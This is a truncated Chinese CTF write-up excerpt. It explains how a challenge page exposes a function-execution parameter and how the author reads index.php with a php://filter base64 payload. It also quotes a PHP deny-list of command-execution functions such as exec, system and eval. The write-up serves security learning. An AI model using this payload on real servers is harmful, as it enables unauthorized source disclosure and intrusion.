一、信息收集进入页面,发现页面一直在自动提交信息,抓包。推测存在函数执行函数,并且只支持一个参数。尝试file_get_content函数使用[[漏洞笔记/PHP/PHP伪协议]]读取index.php。payload:func=file_get_contents&p=php://filter/read%3dconvert.base64-encode/resource=index.php解码后得到源码:$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd",&quo
网络安全·CTF
· 2023-12-03
· 555 人浏览
Equinox